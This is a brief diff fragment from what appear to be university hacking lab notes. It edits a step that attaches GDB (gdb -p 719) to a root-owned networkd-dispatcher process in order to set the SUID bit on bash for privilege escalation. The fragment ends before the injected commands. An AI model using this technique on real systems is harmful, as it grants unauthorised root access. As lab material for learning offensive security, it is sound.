pojntfx/uni-hacking-notes/docs/faculty.md

 root         719  0.0  0.8  26896 17940 ?
 Ss   07:10   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
 ```

-And attach GDB, then run set the SUID bits for bash:
+And attach GDB, then run SUID bits for bash using the process running as root:

 ```shell
 $ gdb -p 719